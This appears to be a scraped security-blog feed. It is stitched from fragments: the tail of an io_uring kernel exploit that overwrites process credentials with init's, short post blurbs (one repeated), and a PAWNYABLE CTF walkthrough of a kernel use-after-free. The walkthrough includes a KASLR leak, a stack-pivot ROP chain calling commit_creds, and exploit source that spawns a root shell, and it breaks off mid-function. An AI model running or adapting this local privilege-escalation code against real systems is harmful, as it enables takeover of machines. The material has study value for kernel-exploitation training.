        {
            g_target_task = current;
        }

        // If we find our target comm, save it
        if (!strcmp(current_comm, OUR_TASK))
        {
            g_our_task = current;
        }
    }
}

void find_pipe_buf_addr(void)
{
    // Get the base of the files array
    uint64_t files_ptr = read_8_at(g_file_array);
    
    // Adjust the files_ptr to point to our fd in the array
    files_ptr += (sizeof(uint64_t) * g_uaf_fd);

    // Get the address of our UAF file struct
    uint64_t curr_file = read_8_at(files_ptr);

    // Calculate the offset
    g_off = curr_file & 0xFFF;

    // Set the globals
    g_file_addr = curr_file;
    g_pipe_buf = g_file_addr - g_off;

    return;
}

void make_ring_copy(void)
{
    // Get the base of the files array
    uint64_t files_ptr = read_8_at(g_file_array);
    
    // Adjust the files_ptr to point to our ring fd in the array
    files_ptr += (sizeof(uint64_t) * g_ring.ring_fd);

    // Get the address of our UAF file struct
    uint64_t curr_file = read_8_at(files_ptr);

    // Copy all the data into the buffer
    for (size_t i = 0; i < 32; i++)
    {
        uint64_t *val_ptr = (uint64_t *)&g_ring_copy[i * 8];
        *val_ptr = read_8_at(curr_file + (i * 8));
    }
}

// Here, all we're doing is determing what side of the page the UAF file is on,
// if its on the front half of the page, the back half is our scratch space
// and vice versa
void set_scratch_space(void)
{
    g_scratch = g_pipe_buf;
    if (g_off < 0x500) { g_scratch += 0x500; }
}

// We failed cross-cache stage, either because we didnt replace UAF object
void cc_fail(void)
{
    cc_reset();
    close(g_uaf_fd);
    g_uaf_fd = -1;
    release_pipe();
    create_pipe();
    sleep(1);
}

void write_pipe(unsigned char *buf)
{
    if (write(g_pipe.fd[PIPE_WRITE], buf, 4096) == -1)
    {
        err("`write()` failed");
    }
}

int main(int argc, char *argv[])
{
    info("Setting up exploit environment...");
    setup_env();

    // Create a debug buffer
    unsigned char buf[4096] = { 0 };
    memset(buf, 'A', 4096); 

retry_cc:
    // Do cross-cache attempt
    info("Attempting cross-cache...");
    do_cc();

    // Replace UAF file (and page) with pipe page
    write_pipe(buf);

    // Try to `lseek()` which should fail if we succeeded
    if (lseek(g_uaf_fd, 0, SEEK_SET) != -1)
    {
        printf("[!] Cross-cache failed, retrying...");
        cc_fail();
        goto retry_cc;
    }

    // Success
    info("Cross-cache succeeded");
    sleep(1);

    // Leak the `error_entry` pointer
    uint64_t error_entry = read_8_at(ERROR_ENTRY_ADDR);
    info("Leaked `error_entry` address: 0x%lx", error_entry);

    // Make sure it seems kernel-ish
    if ((uint16_t)(error_entry >> 48) != 0xFFFF)
    {
        err("Weird `error_entry` address: 0x%lx", error_entry);
    }

    // Set kernel base
    g_kern_base = error_entry - EE_OFF;
    info("Kernel base: 0x%lx", g_kern_base);

    // Read 8 bytes at that address and see if they match our signature
    uint64_t sig = read_8_at(g_kern_base);
    if (sig != KERNEL_SIGNATURE) 
    {
        err("Bad kernel signature: 0x%lx", sig);
    }

    // Set init_task
    g_init_task = g_kern_base + INIT_OFF;
    info("init_task @ 0x%lx", g_init_task);

    // Get the cred and nsproxy values
    g_cred_what = read_8_at(g_init_task + CRED_OFF);
    g_nsproxy_what = read_8_at(g_init_task + NSPROXY_OFF);

    if ((uint16_t)(g_cred_what >> 48) != 0xFFFF)
    {
        err("Weird init->cred value: 0x%lx", g_cred_what);
    }

    if ((uint16_t)(g_nsproxy_what >> 48) != 0xFFFF)
    {
        err("Weird init->nsproxy value: 0x%lx", g_nsproxy_what);
    }

    info("init cred address: 0x%lx", g_cred_what);
    info("init nsproxy address: 0x%lx", g_nsproxy_what);

    // Traverse the tasks list
    info("Traversing tasks linked list...");
    traverse_tasks();

    // Check to see if we succeeded
    if (!g_target_task) { err("Unable to find target task!"); }
    if (!g_our_task)    { err("Unable to find our task!"); }

    // We found the target task
    info("Found '%s' task @ 0x%lx", TARGET_TASK, g_target_task);
    info("Found '%s' task @ 0x%lx", OUR_TASK, g_our_task);

    // Set where gadgets
    g_cred_where = g_target_task + CRED_OFF;
    g_real_cred_where = g_target_task + REAL_CRED_OFF;
    g_nsproxy_where = g_target_task + NSPROXY_OFF;

    info("Target cred @ 0x%lx", g_cred_where);
    info("Target real_cred @ 0x%lx", g_real_cred_where);
    info("Target nsproxy @ 0x%lx", g_nsproxy_where);

    // Locate our file descriptor table
    g_files = g_our_task + FILES_OFF;
    g_fdt = read_8_at(g_files) + FDT_OFF;
    g_file_array = read_8_at(g_fdt) + FD_ARRAY_OFF;

    info("Our files @ 0x%lx", g_files);
    info("Our file descriptor table @ 0x%lx", g_fdt);
    info("Our file array @ 0x%lx", g_file_array);

    // Find our pipe address
    find_pipe_buf_addr();
    info("UAF file addr: 0x%lx", g_file_addr);
    info("Pipe buffer addr: 0x%lx", g_pipe_buf);

    // Set the global scratch space side of the page
    set_scratch_space();
    info("Scratch space base @ 0x%lx", g_scratch);

    // Make a copy of our real io_uring file descriptor since we need to fake
    // one
    info("Making copy of legitimate io_uring fd...");
    make_ring_copy();
    info("Copy done");

    // Overwrite our task's cred with init's
    info("Overwriting our cred with init's...");
    overwrite_cred();

    // Make sure it's correct
    uint64_t check_cred = read_8_at(g_cred_where);
    if (check_cred != g_cred_what)
    {
        err("check_cred: 0x%lx != g_cred_what: 0x%lx",
            check_cred, g_cred_what);
    }

    // Overwrite our real_cred with init's cred
    sleep(1);
    info("Overwriting our real_cred with init's...");
    overwrite_real_cred();

    // Make sure it's correct
    check_cred = read_8_at(g_real_cred_where);
    if (check_cred != g_cred_what)
    {
        err("check_cred: 0x%lx != g_cred_what: 0x%lx", check_cred, g_cred_what);
    }

    // Overwrite our nsproxy with init's
    sleep(1);
    info("Overwriting our nsproxy with init's...");
    overwrite_nsproxy();

    // Make sure it's correct
    check_cred = read_8_at(g_nsproxy_where);
    if (check_cred != g_nsproxy_what)
    {
        err("check_rec: 0x%lx != g_nsproxy_what: 0x%lx",
            check_cred, g_nsproxy_what);
    }

    info("Creds and namespace look good!");
    
    // Let the child loose
    *(int *)g_shmem = 0x1337;

    sleep(3000);
}

Bypassing Intel CET with Counterfeit Objects

26 August 2022 at 00:00
Since its inception in 20051, return-oriented programming (ROP) has been the predominant avenue to thwart W^X2 mitigation during memory corruption exploitation. While Data Execution Prevention (DEP) has been engineered to block plain code injection attacks from specific memory areas, attackers have quickly adapted and instead of injecting an entire code payload, they resorted in reusing multiple code chunks from DEP-allowed memory pages, called ROP gadgets. These code chunks are taken from already existing code in the target application and chained together to resemble the desired attacker payload or to just disable DEP on a per page basis to allow the existing code payloads to run.

Practical Reverse Engineering' Solutions - Chapter 1 - Part 2

1 December 2022 at 00:00
Introduction From now on, I decided to prioritize the exercises form which I think I can gain the most, so here am I going to cover just the Kernel routines decompilation/explanation. The book originally focused on x86 by this point, but since we are in 2020 I feel might be useful to cover both x86 and x64. Chapter 1 - Page 35 Decompile the following kernel routines in Windows: KeInitializeDpc KeInitializeApc ObFastDereferenceObject (and explain its calling convention) KeInitializeQueue KxWaitForLockChainValid KeReadyThread KiInitializeTSS RtlValidateUnicodeString Debugging Setup For debugging purpose I have used WinDbg with remote KD.

Bypassing Intel CET with Counterfeit Objects

10 June 2022 at 00:00
Since its inception in 20051, return-oriented programming (ROP) has been the predominant avenue to thwart W^X2 mitigation during memory corruption exploitation. While Data Execution Prevention (DEP) has been engineered to block plain code injection attacks from specific memory areas, attackers have quickly adapted and instead of injecting an entire code payload, they resorted in reusing multiple code chunks from DEP-allowed memory pages, called ROP gadgets. These code chunks are taken from already existing code in the target application and chained together to resemble the desired attacker payload or to just disable DEP on a per page basis to allow the existing code payloads to run.

Everything you need to know about the OpenSSL 3.0.7 Patch (CVE-2022-3602 & CVE-2022-3786)

1 November 2022 at 10:27

Discussion thread: https://updatedsecurity.com/topic/9-openssl-vulnerability-cve-2022-3602-cve-2022-3786/ Vulnerability Details From https://www.openssl.org/news/secadv/20221101.txt X.509 Email Address 4-byte Buffer Overflow (CVE-2022-3602) ========================================================== Severity: High A buffer overrun can be triggered in X.509

The post Everything you need to know about the OpenSSL 3.0.7 Patch (CVE-2022-3602 & CVE-2022-3786) appeared first on MalwareTech.

PAWNYABLE UAF Walkthrough (Holstein v3)

By: h0mbre
29 October 2022 at 04:00

Introduction

I’ve been wanting to learn Linux Kernel exploitation for some time and a couple months ago @ptrYudai from @zer0pts tweeted that they released the beta version of their website PAWNYABLE!, which is a “resource for middle to advanced learners to study Binary Exploitation”. The first section on the website with material already ready is “Linux Kernel”, so this was a perfect place to start learning.

The author does a great job explaining everything you need to know to get started, things like: setting up a debugging environment, CTF-specific tips, modern kernel exploitation mitigations, using QEMU, manipulating images, per-CPU slab caches, etc, so this blogpost will focus exclusively on my experience with the challenge and the way I decided to solve it. I’m going to try and limit redundant information within this blogpost so if you have any questions, it’s best to consult PAWNYABLE and the other linked resources.

What I Started With

PAWNYABLE ended up being a great way for me to start learning about Linux Kernel exploitation, mainly because I didn’t have to spend any time getting up to speed on a kernel subsystem in order to start wading into the exploitation metagame. For instance, if you are the type of person who learns by doing, and you’re first attempt at learning about this stuff was to write your own exploit for CVE-2022-32250, you would first have to spend a considerable amount of time learning about Netfilter. Instead, PAWNYABLE gives you a straightforward example of a vulnerability in one of a handful of bug-classes, and then gets to work showing you how you could exploit it. I think this strategy is great for beginners like me. It’s worth noting that after having spent some time with PAWNYABLE, I have been able to write some exploits for real world bugs similar to CVE-2022-32250, so my strategy did prove to be fruitful (at least for me).

I’ve been doing low-level binary stuff (mostly on Linux) for the past 3 years. Initially I was very interested in learning binary exploitation but starting gravitating towards vulnerability discovery and fuzzing. Fuzzing has captivated me since early 2020, and developing my own fuzzing frameworks actually lead to me working as a full time software developer for the last couple of years. So after going pretty deep with fuzzing (objectively not that deep as it relates to the entire fuzzing space, but deep for the uninitiated) , I wanted to circle back and learn at least some aspect of binary exploitation that applied to modern targets.

The Linux Kernel, as a target, seemed like a happy marriage between multiple things: it’s relatively easy to write exploits for due to a lack of mitigations, exploitable bugs and their resulting exploits have a wide and high impact, and there are active bounty systems/programs for Linux Kernel exploits. As a quick side-note, there have been some tremendous strides made in the world of Linux Kernel fuzzing in the last few years so I knew that specializing in this space would allow me to get up to speed on those approaches/tools.

So coming into this, I had a pretty good foundation of basic binary exploitation (mostly dated Windows and Linux userland stuff), a few years of C development (to include a few Linux Kernel modules), and some reverse engineering skills.

What I Did

To get started, I read through the following PAWNYABLE sections (section names have been Google translated to English):

  • Introduction to kernel exploits
  • kernel debugging with gdb
  • security mechanism (Overview of Exploitation Mitigations)
  • Compile and transfer exploits (working with the kernel image)

This was great as a starting point because everything is so well organized you don’t have to spend time setting up your environment, its basically just copy pasting a few commands and you’re off and remotely debugging a kernel via GDB (with GEF even).

Next, I started working on the first challenge which is a stack-based buffer overflow vulnerability in Holstein v1. This is a great starting place because right away you get control of the instruction pointer and from there, you’re learning about things like the way CTF players (and security researchers) often leverage kernel code execution to escalate privileges like prepare_kernel_creds and commit_creds.

You can write an exploit that bypasses mitigations or not, it’s up to you. I started slowly and wrote an exploit with no mitigations enabled, then slowly turned the mitigations up and changed the exploit as needed.

After that, I started working on a popular Linux kernel pwn challenge called “kernel-rop” from hxpCTF 2020. I followed along and worked alongside the following blogposts from @_lkmidas:

This was great because it gave me a chance to reinforce everything I had learned from the PAWNYABLE stack buffer overflow challenge and also I learned a few new things. I also used (https://0x434b.dev/dabbling-with-linux-kernel-exploitation-ctf-challenges-to-learn-the-ropes/) to supplement some of the information.

As a bonus, I also wrote a version of the exploit that utilized a different technique to elevate privileges: overwriting modprobe_path.

After all this, I felt like I had a good enough base to get started on the UAF challenge.

UAF Challenge: Holstein v3

Some quick vulnerability analysis on the vulnerable driver provided by the author states the problem clearly.

char *g_buf = NULL;

static int module_open(struct inode *inode, struct file *file)
{
  printk(KERN_INFO "module_open called\n");

  g_buf = kzalloc(BUFFER_SIZE, GFP_KERNEL);
  if (!g_buf) {
    printk(KERN_INFO "kmalloc failed");
    return -ENOMEM;
  }

  return 0;
}

When we open the kernel driver, char *g_buf gets assigned the result of a call to kzalloc().

static int module_close(struct inode *inode, struct file *file)
{
  printk(KERN_INFO "module_close called\n");
  kfree(g_buf);
  return 0;
}

When we close the kernel driver, g_buf is freed. As the author explains, this is a buggy code pattern since we can open multiple handles to the driver from within our program. Something like this can occur.

  1. We’ve done nothing, g_buf = NULL
  2. We’ve opened the driver, g_buf = 0xffff...a0, and we have fd1 in our program
  3. We’ve opened the driver a second time, g_buf = 0xffff...b0 . The original value of 0xffff...a0 has been overwritten. It can no longer be freed and would cause a memory leak (not super important). We now have fd2 in our program
  4. We close fd1 which calls kfree() on 0xffff...b0 and frees the same pointer we have a reference to with fd2.

At this point, via our access to fd2, we have a use after free since we can still potentially use a freed reference to g_buf. The module also allows us to use the open file descriptor with read and write methods.

static ssize_t module_read(struct file *file,
                           char __user *buf, size_t count,
                           loff_t *f_pos)
{
  printk(KERN_INFO "module_read called\n");

  if (count > BUFFER_SIZE) {
    printk(KERN_INFO "invalid buffer size\n");
    return -EINVAL;
  }

  if (copy_to_user(buf, g_buf, count)) {
    printk(KERN_INFO "copy_to_user failed\n");
    return -EINVAL;
  }

  return count;
}

static ssize_t module_write(struct file *file,
                            const char __user *buf, size_t count,
                            loff_t *f_pos)
{
  printk(KERN_INFO "module_write called\n");

  if (count > BUFFER_SIZE) {
    printk(KERN_INFO "invalid buffer size\n");
    return -EINVAL;
  }

  if (copy_from_user(g_buf, buf, count)) {
    printk(KERN_INFO "copy_from_user failed\n");
    return -EINVAL;
  }

  return count;
}

So with these methods, we are able to read and write to our freed object. This is great for us since we’re free to pretty much do anything we want. We are limited somewhat by the object size which is hardcoded in the code to 0x400.

At a high-level, UAFs are generally exploited by creating the UAF condition, so we have a reference to a freed object within our control, and then we want to cause the allocation of a different object to fill the space that was previously filled by our freed object.

So if we allocated a g_buf of size 0x400 and then freed it, we need to place another object in its place. This new object would then be the target of our reads and writes.

KASLR Bypass

The first thing we need to do is bypass KASLR by leaking some address that is a known static offset from the kernel image base. I started searching for objects that have leakable members and again, @ptrYudai came to the rescue with a catalog on useful Linux Kernel data structures for exploitation. This lead me to the tty_struct which is allocated on the same slab cache as our 0x400 buffer, the kmalloc-1024. The tty_struct has a field called tty_operations which is a pointer to a function table that is a static offset from the kernel base. So if we can leak the address of tty_operations we will have bypassed KASLR. This struct was used by NCCGROUP for the same purpose in their exploit of CVE-2022-32250.

It’s important to note that slab cache that we’re targeting is per-CPU. Luckily, the VM we’re given for the challenge only has one logical core so we don’t have to worry about CPU affinity for this exercise. On most systems with more than one core, we would have to worry about influencing one specific CPU’s cache.

So with our module_read ability, we will simply:

  1. Free g_buf
  2. Create dev_tty structs until one hopefully fills the freed space where g_buf used to live
  3. Call module_read to get a copy of the g_buf which is now actually our dev_tty and then inspect the value of tty_struct->tty_operations.

Here are some snippets of code related to that from the exploit:

// Leak a tty_struct->ops field which is constant offset from kernel base
uint64_t leak_ops(int fd) {
    if (fd < 0) {
        err("Bad fd given to `leak_ops()`");
    }

    /* tty_struct {
        int magic;      // 4 bytes
        struct kref;    // 4 bytes (single member is an int refcount_t)
        struct device *dev; // 8 bytes
        struct tty_driver *driver; // 8 bytes
        const struct tty_operations *ops; (offset 24 (or 0x18))
        ...
    } */

    // Read first 32 bytes of the structure
    unsigned char *ops_buf = calloc(1, 32);
    if (!ops_buf) {
        err("Failed to allocate ops_buf");
    }

    ssize_t bytes_read = read(fd, ops_buf, 32);
    if (bytes_read != (ssize_t)32) {
        err("Failed to read enough bytes from fd: %d", fd);
    }

    uint64_t ops = *(uint64_t *)&ops_buf[24];
    info("tty_struct->ops: 0x%lx", ops);

    // Solve for kernel base, keep the last 12 bits
    uint64_t test = ops & 0b111111111111;

    // These magic compares are for static offsets on this kernel
    if (test == 0xb40ULL) {
        return ops - 0xc39b40ULL;
    }

    else if (test == 0xc60ULL) {
        return ops - 0xc39c60ULL;
    }

    else {
        err("Got an unexpected tty_struct->ops ptr");
    }
}

There’s a confusing part about ANDing off the lower 12 bits of the leaked value and that’s because I kept getting one of two values during multiple runs of the exploit within the same boot. This is probably because there’s two kinds of tty_structs that can be allocated and they are allocated in pairs. This if else if block just handles both cases and solves the kernel base for us. So at this point we have bypassed KASLR because we know the base address the kernel is loaded at.

RIP Control

Next, we need someway to high-jack execution. Luckily, we can use the same data structure, tty_struct as we can write to the object using module_write and we can overwrite the pointer value for tty_struct->ops.

struct tty_operations is a table of function pointers, and looks like this:

struct tty_struct * (*lookup)(struct tty_driver *driver,
			struct file *filp, int idx);
	int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
	void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
	int  (*open)(struct tty_struct * tty, struct file * filp);
	void (*close)(struct tty_struct * tty, struct file * filp);
	void (*shutdown)(struct tty_struct *tty);
	void (*cleanup)(struct tty_struct *tty);
	int  (*write)(struct tty_struct * tty,
		      const unsigned char *buf, int count);
	int  (*put_char)(struct tty_struct *tty, unsigned char ch);
	void (*flush_chars)(struct tty_struct *tty);
	unsigned int (*write_room)(struct tty_struct *tty);
	unsigned int (*chars_in_buffer)(struct tty_struct *tty);
	int  (*ioctl)(struct tty_struct *tty,
		    unsigned int cmd, unsigned long arg);
...SNIP...

These functions are invoked on the tty_struct when certain actions are performed on an instance of a tty_struct. For example, when the tty_struct’s controlling process exits, several of these functions are called in a row: close(), shutdown(), and cleanup().

So our plan, will be to:

  1. Create UAF condition
  2. Occupy free’d memory with tty_struct
  3. Read a copy of the tty_struct back to us in userland
  4. Alter the tty->ops value to point to a faked function table that we control
  5. Write the new data back to the tty_struct which is now corrupted
  6. Do something to the tty_struct that causes a function we control to be invoked

PAWNYABLE tells us that a popular target is invoking ioctl() as the function takes several arguments which are user-controlled.

int  (*ioctl)(struct tty_struct *tty,
		    unsigned int cmd, unsigned long arg);

From userland, we can supply the values for cmd and arg. This gives us some flexibility. The value we can provide for cmd is somewhat limited as an unsigned int is only 4 bytes. arg gives us a full 8 bytes of control over RDX. Since we can control the contents of RDX whenever we invoke ioctl(), we need to find a gadget to pivot the stack to some code in the kernel heap that we can control. I found such a gadget here:

0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret;

We will push a value from RDX onto the stack, and then later pop that value into RSP. When ioctl() returns, we will return to whatever value we called ioctl() with in arg. So the control flow will go something like:

  1. Invoke ioctl() on our corrupted tty_struct
  2. ioctl() has been overwritten by a stack-pivot gadget that places the location of our ROP chain into RSP
  3. ioctl() returns execution to our ROP chain

So now we have a new problem, how do we create a fake function table and ROP chain in the kernel heap AND figure out where we stored them?

Creating/Locating a ROP Chain and Fake Function Table

This is where I started to diverge from the author’s exploitation strategy. I couldn’t quite follow along with the intended solution for this problem, so I began searching for other ways. With our extremely powerful read capability in mind, I remembered the msg_msg struct from @ptrYudai’s aforementioned structure catalog, and realized that the structure was perfect for our purposes as it:

  • Stores arbitrary data inline in the structure body (not via a pointer to the heap)
  • Contains a linked-list member that contains the addresses to prev and next messages within the same kernel message queue

So quickly, a strategy began to form. We could:

  1. Create our ROP chain and Fake Function table in a buffe
  2. Send the buffer as the body of a msg_msg struct
  3. Use our module_read capability to read the msg_msg->list.next and msg_msg->list.prev values to know where in the heap at least two of our messages were stored

With this ability, we would know exactly what address to supply as an argument to ioctl() when we invoke it in order to pivot the stack into our ROP chain. Here is some code related to that from the exploit:

// Allocate one msg_msg on the heap
size_t send_message() {
    // Calcuate current queue
    if (num_queue < 1) {
        err("`send_message()` called with no message queues");
    }
    int curr_q = msg_queue[num_queue - 1];

    // Send message
    size_t fails = 0;
    struct msgbuf {
        long mtype;
        char mtext[MSG_SZ];
    } msg;

    // Unique identifier we can use
    msg.mtype = 0x1337;

    // Construct the ROP chain
    memset(msg.mtext, 0, MSG_SZ);

    // Pattern for offsets (debugging)
    uint64_t base = 0x41;
    uint64_t *curr = (uint64_t *)&msg.mtext[0];
    for (size_t i = 0; i < 25; i++) {
        uint64_t fill = base << 56;
        fill |= base << 48;
        fill |= base << 40;
        fill |= base << 32;
        fill |= base << 24;
        fill |= base << 16;
        fill |= base << 8;
        fill |= base;
        
        *curr++ = fill;
        base++; 
    }

    // ROP chain
    uint64_t *rop = (uint64_t *)&msg.mtext[0];
    *rop++ = pop_rdi; 
    *rop++ = 0x0;
    *rop++ = prepare_kernel_cred; // RAX now holds ptr to new creds
    *rop++ = xchg_rdi_rax; // Place creds into RDI 
    *rop++ = commit_creds; // Now we have super powers
    *rop++ = kpti_tramp;
    *rop++ = 0x0; // pop rax inside kpti_tramp
    *rop++ = 0x0; // pop rdi inside kpti_tramp
    *rop++ = (uint64_t)pop_shell; // Return here
    *rop++ = user_cs;
    *rop++ = user_rflags;
    *rop++ = user_sp;
    *rop   = user_ss;

    /* struct tty_operations {
        struct tty_struct * (*lookup)(struct tty_driver *driver,
                struct file *filp, int idx);
        int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
        void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
        int  (*open)(struct tty_struct * tty, struct file * filp);
        void (*close)(struct tty_struct * tty, struct file * filp);
        void (*shutdown)(struct tty_struct *tty);
        void (*cleanup)(struct tty_struct *tty);
        int  (*write)(struct tty_struct * tty,
                const unsigned char *buf, int count);
        int  (*put_char)(struct tty_struct *tty, unsigned char ch);
        void (*flush_chars)(struct tty_struct *tty);
        unsigned int (*write_room)(struct tty_struct *tty);
        unsigned int (*chars_in_buffer)(struct tty_struct *tty);
        int  (*ioctl)(struct tty_struct *tty,
                unsigned int cmd, unsigned long arg);
        ...
    } */

    // Populate the 12 function pointers in the table that we have created.
    // There are 3 handlers that are invoked for allocated tty_structs when 
    // their controlling process exits, they are close(), shutdown(),
    // and cleanup(). We have to overwrite these pointers for when we exit our
    // exploit process or else the kernel will panic with a RIP of 
    // 0xdeadbeefdeadbeef. We overwrite them with a simple ret gadget
    uint64_t *func_table = (uint64_t *)&msg.mtext[rop_len];
    for (size_t i = 0; i < 12; i++) {
        // If i == 4, we're on the close() handler, set to ret gadget
        if (i == 4) { *func_table++ = ret; continue; }

        // If i == 5, we're on the shutdown() handler, set to ret gadget
        if (i == 5) { *func_table++ = ret; continue; }

        // If i == 6, we're on the cleanup() handler, set to ret gadget
        if (i == 6) { *func_table++ = ret; continue; }

        // Magic value for debugging
        *func_table++ = 0xdeadbeefdeadbe00 + i;
    }

    // Put our gadget address as the ioctl() handler to pivot stack
    *func_table = push_rdx;

    // Spray msg_msg's on the heap
    if (msgsnd(curr_q, &msg, MSG_SZ, IPC_NOWAIT) == -1) {
        fails++;
    }

    return fails;
}

I got a bit wordy with the comments in this block, but it’s for good reason. I didn’t want the exploit to ruin the kernel state, I wanted to exit cleanly. This presented a problem as we are completely hi-jacking the ops function table which the kernel will use to cleanup our tty_struct. So I found a gadget that simply performs a ret operation, and overwrote the function pointers for close(), shutdown(), and cleanup() so that when they are invoked, they simply return and the kernel is apparently fine with this and doesn’t panic.

So our message body looks something like: <—-ROP—-Faked Function Table—->

Here is the code I used to overwrite the tty_struct->ops pointer:

void overwrite_ops(int fd) {
    unsigned char g_buf[GBUF_SZ] = { 0 };
    ssize_t bytes_read = read(fd, g_buf, GBUF_SZ);
    if (bytes_read != (ssize_t)GBUF_SZ) {
        err("Failed to read enough bytes from fd: %d", fd);
    }

    // Overwrite the tty_struct->ops pointer with ROP address
    *(uint64_t *)&g_buf[24] = fake_table;
    ssize_t bytes_written = write(fd, g_buf, GBUF_SZ);
    if (bytes_written != (ssize_t)GBUF_SZ) {
        err("Failed to write enough bytes to fd: %d", fd);
    }
}

So now that we know where our ROP chain is, and where our faked function table is, and we have the perfect stack pivot gadget, the rest of this process is simply building a real ROP chain which I will leave out of this post.

As a first timer, this tiny bit of creativity to leverage the read ability to leak the addresses of msg_msg structs was enough to get me hooked. Here is a picture of the exploit in action:

Miscellaneous

There were some things I tried to do to increase the exploit’s reliability.

One was to check the magic value in the leaked tty_structs to make sure a tty_struct had actually filled our freed memory and not another object. This is extremely convenient! All tty_structs have 0x5401 at tty->magic.

Another thing I did was spray msg_msg structs with an easily recognizable message type of 0x1337. This way when leaked, I could easily verify I was in fact leaking msg_msg contents and not some other arbitrary data structure. Another thing you could do would be to make sure supposed kernel addresses start with 0xffff.

Finally, there was the patching of the clean-up-related function pointers in tty->ops.

Further Reading

There are lots of challenges besides the UAF one on PAWNYABLE, please go check them out. One of the primary reasons I wrote this was to get the author’s project more visitors and beneficiaries. It has made a big difference for me and in the almost month since I finished this challenge, I have learned a ton. Special thanks to @chompie1337 for letting me complain and giving me helpful advice/resources.

Some awesome blogposts I read throughout the learning process up to this point include:

  • https://www.graplsecurity.com/post/iou-ring-exploiting-the-linux-kernel
  • https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html
  • https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/
  • https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html

Exploit Code

// One liner to add exploit to filesystem
// gcc exploit.c -o exploit -static && cp exploit rootfs && cd rootfs && find . -print0 | cpio -o --format=newc --null --owner=root > ../rootfs.cpio && cd ../

#include <stdio.h> /* printf */
#include <sys/types.h> /* open */
#include <sys/stat.h> /* open */
#include <fcntl.h> /* open */
#include <stdlib.h> /* exit */
#include <stdint.h> /* int_t's */
#include <unistd.h> /* getuid */
#include <string.h> /* memset */
#include <sys/ipc.h> /* msg_msg */ 
#include <sys/msg.h> /* msg_msg */
#include <sys/ioctl.h> /* ioctl */
#include <stdarg.h> /* va_args */
#include <stdbool.h> /* true, false */ 

#define DEV "/dev/holstein"
#define PTMX "/dev/ptmx"

#define PTMX_SPRAY (size_t)50       // Number of terminals to allocate
#define MSG_SPRAY (size_t)32        // Number of msg_msg's per queue
#define NUM_QUEUE (size_t)4         // Number of msg queues
#define MSG_SZ (size_t)512          // Size of each msg_msg, modulo 8 == 0
#define GBUF_SZ (size_t)0x400       // Size of g_buf in driver

// User state globals
uint64_t user_cs;
uint64_t user_ss;
uint64_t user_rflags;
uint64_t user_sp;

// Mutable globals, when in Rome
uint64_t base;
uint64_t rop_addr;
uint64_t fake_table;
uint64_t ioctl_ptr;
int open_ptmx[PTMX_SPRAY] = { 0 };          // Store fds for clean up/ioctl()
int num_ptmx = 0;                           // Number of open fds
int msg_queue[NUM_QUEUE] = { 0 };           // Initialized message queues
int num_queue = 0;

// Misc constants. 
const uint64_t rop_len = 200;
const uint64_t ioctl_off = 12 * sizeof(uint64_t);

// Gadgets
// 0x723c0: commit_creds
uint64_t commit_creds;
// 0x72560: prepare_kernel_cred
uint64_t prepare_kernel_cred;
// 0x800e10: swapgs_restore_regs_and_return_to_usermode
uint64_t kpti_tramp;
// 0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret; (stack pivot)
uint64_t push_rdx;
// 0x35738d: pop rdi; ret;
uint64_t pop_rdi;
// 0x487980: xchg rdi, rax; sar bh, 0x89; ret;
uint64_t xchg_rdi_rax;
// 0x32afea: ret;
uint64_t ret;

void err(const char* format, ...) {
    if (!format) {
        exit(-1);
    }

    fprintf(stderr, "%s", "[!] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    va_end(args);
    fprintf(stderr, "%s", "\n");
    exit(-1);
}

void info(const char* format, ...) {
    if (!format) {
        return;
    }
    
    fprintf(stderr, "%s", "[*] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    va_end(args);
    fprintf(stderr, "%s", "\n");
}

void save_state(void) {
    __asm__(
        ".intel_syntax noprefix;"   
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        // Push CPU flags onto stack
        "pushf;"
        // Pop CPU flags into var
        "pop user_rflags;"
        ".att_syntax;"
    );
}

// Should spawn a root shell
void pop_shell(void) {
    uid_t uid = getuid();
    if (uid != 0) {
        err("We are not root, wtf?");
    }

    info("We got root, spawning shell!");
    system("/bin/sh");
    exit(0);
}

// Open a char device, just exit on error, this is exploit code
int open_device(char *dev, int flags) {
    int fd = -1;
    if (!dev) {
        err("NULL ptr given to `open_device()`");
    }

    fd = open(dev, flags);
    if (fd < 0) {
        err("Failed to open '%s'", dev);
    }

    return fd;
}

// Spray kmalloc-1024 sized '/dev/ptmx' structures on the kernel heap
void alloc_ptmx() {
    int fd = open("/dev/ptmx", O_RDONLY | O_NOCTTY);
    if (fd < 0) {
        err("Failed to open /dev/ptmx");
    }

    open_ptmx[num_ptmx] = fd;
    num_ptmx++;
}

// Check to see if we have a reference to a tty_struct by reading in the magic
// number for the current allocation in our slab
bool found_ptmx(int fd) {
    unsigned char magic_buf[4];
    if (fd < 0) {
        err("Bad fd given to `found_ptmx()`\n");
    }

    ssize_t bytes_read = read(fd, magic_buf, 4);
    if (bytes_read != (ssize_t)bytes_read) {
        err("Failed to read enough bytes from fd: %d", fd);
    }

    if (*(int32_t *)magic_buf != 0x5401) {
        return false;
    }

    return true;
}

// Leak a tty_struct->ops field which is constant offset from kernel base
uint64_t leak_ops(int fd) {
    if (fd < 0) {
        err("Bad fd given to `leak_ops()`");
    }

    /* tty_struct {
        int magic;      // 4 bytes
        struct kref;    // 4 bytes (single member is an int refcount_t)
        struct device *dev; // 8 bytes
        struct tty_driver *driver; // 8 bytes
        const struct tty_operations *ops; (offset 24 (or 0x18))
        ...
    } */

    // Read first 32 bytes of the structure
    unsigned char *ops_buf = calloc(1, 32);
    if (!ops_buf) {
        err("Failed to allocate ops_buf");
    }

    ssize_t bytes_read = read(fd, ops_buf, 32);
    if (bytes_read != (ssize_t)32) {
        err("Failed to read enough bytes from fd: %d", fd);
    }

    uint64_t ops = *(uint64_t *)&ops_buf[24];
    info("tty_struct->ops: 0x%lx", ops);

    // Solve for kernel base, keep the last 12 bits
    uint64_t test = ops & 0b111111111111;

    // These magic compares are for static offsets on this kernel
    if (test == 0xb40ULL) {
